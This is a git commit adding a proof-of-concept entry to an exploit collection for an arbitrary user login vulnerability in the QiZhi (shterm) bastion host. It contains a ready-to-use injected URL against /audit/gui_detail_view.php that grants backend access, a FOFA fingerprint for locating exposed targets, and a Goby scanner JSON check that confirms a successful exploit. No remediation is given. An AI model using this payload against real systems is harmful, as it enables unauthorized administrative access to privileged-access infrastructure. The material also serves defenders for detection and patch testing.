update 齐治堡垒机exp

2022-01-13 17:54:41 +08:00 · 2022-01-13 17:54:41 +08:00 · e5142e5082
commit e5142e5082
parent a77141be18
6 changed files with 95 additions and 0 deletions
--- a/11-齐治堡垒机/齐治堡垒机任意用户登录漏洞/.DS_Store
+++ b/11-齐治堡垒机/齐治堡垒机任意用户登录漏洞/.DS_Store
--- a/11-齐治堡垒机/齐治堡垒机任意用户登录漏洞/README.md
+++ b/11-齐治堡垒机/齐治堡垒机任意用户登录漏洞/README.md
@ -0,0 +1,3 @@
+# 齐治堡垒机
+
+#### 齐治堡垒机 任意用户登录漏洞
--- a/11-齐治堡垒机/齐治堡垒机任意用户登录漏洞/image/qz-1.png
+++ b/11-齐治堡垒机/齐治堡垒机任意用户登录漏洞/image/qz-1.png
--- a/11-齐治堡垒机/齐治堡垒机任意用户登录漏洞/image/qz-2.png
+++ b/11-齐治堡垒机/齐治堡垒机任意用户登录漏洞/image/qz-2.png
--- a/11-齐治堡垒机/齐治堡垒机任意用户登录漏洞/shtermQiZhi_Fortress_Arbitrary_User_Login.json
+++ b/11-齐治堡垒机/齐治堡垒机任意用户登录漏洞/shtermQiZhi_Fortress_Arbitrary_User_Login.json
@ -0,0 +1,55 @@
+{
+      "Name": "shterm(QiZhi) Fortress Arbitrary User Login",
+      "Level": "3",
+      "Tags": [
+            "Any user login"
+      ],
+      "GobyQuery": "app=\"shterm-Fortres-Machine\"",
+      "Description": "Qizhi fortress machine has any user login vulnerability, access to a specific URL can obtain background permissions",
+      "Product": "shterm(QiZhi) Fortress ",
+      "Homepage": "shterm.com",
+      "Author": "PeiQi",
+      "Impact": "<p>Get background permission<br></p>",
+      "Recommandation": "",
+      "References": [
+            "http://wiki.peiqi.tech"
+      ],
+      "ScanSteps": [
+            "AND",
+            {
+                  "Request": {
+                        "method": "GET",
+                        "uri": "/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm",
+                        "follow_redirect": false,
+                        "header": {
+                              "Cookie": "PHPSESSID=4uh4l0e3b0fd28d27l71u5be36"
+                        },
+                        "data_type": "text",
+                        "data": ""
+                  },
+                  "ResponseTest": {
+                        "type": "group",
+                        "operation": "AND",
+                        "checks": [
+                              {
+                                    "type": "item",
+                                    "variable": "$code",
+                                    "operation": "==",
+                                    "value": "200",
+                                    "bz": ""
+                              },
+                              {
+                                    "type": "item",
+                                    "variable": "$body",
+                                    "operation": "contains",
+                                    "value": "错误的id",
+                                    "bz": ""
+                              }
+                        ]
+                  },
+                  "SetVariable": []
+            }
+      ],
+      "PostTime": "2021-04-09 23:53:26",
+      "GobyVersion": "1.8.255"
+}
--- a/11-齐治堡垒机/齐治堡垒机任意用户登录漏洞/齐治堡垒机任意用户登录漏洞.md
+++ b/11-齐治堡垒机/齐治堡垒机任意用户登录漏洞/齐治堡垒机任意用户登录漏洞.md
@ -0,0 +1,37 @@
+# 齐治堡垒机 任意用户登录漏洞
+
+## 漏洞描述
+
+齐治堡垒机 存在任意用户登录漏洞，访问特定的Url即可获得后台权限
+
+## 漏洞影响
+
+> [!NOTE]
+>
+> 齐治堡垒机
+
+## FOFA
+
+> [!NOTE]
+>
+> app="齐治科技-堡垒机"
+
+## 漏洞复现
+
+漏洞POC为
+
+```
+http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
+```
+
+![](image/qz-1.png)
+
+## Goby & POC
+
+> [!NOTE]
+>
+> 已上传 https://github.com/PeiQi0/PeiQi-WIKI-POC Goby & POC 目录中
+>
+> shterm(QiZhi) Fortress Arbitrary User Login
+
+![](image/qz-2.png)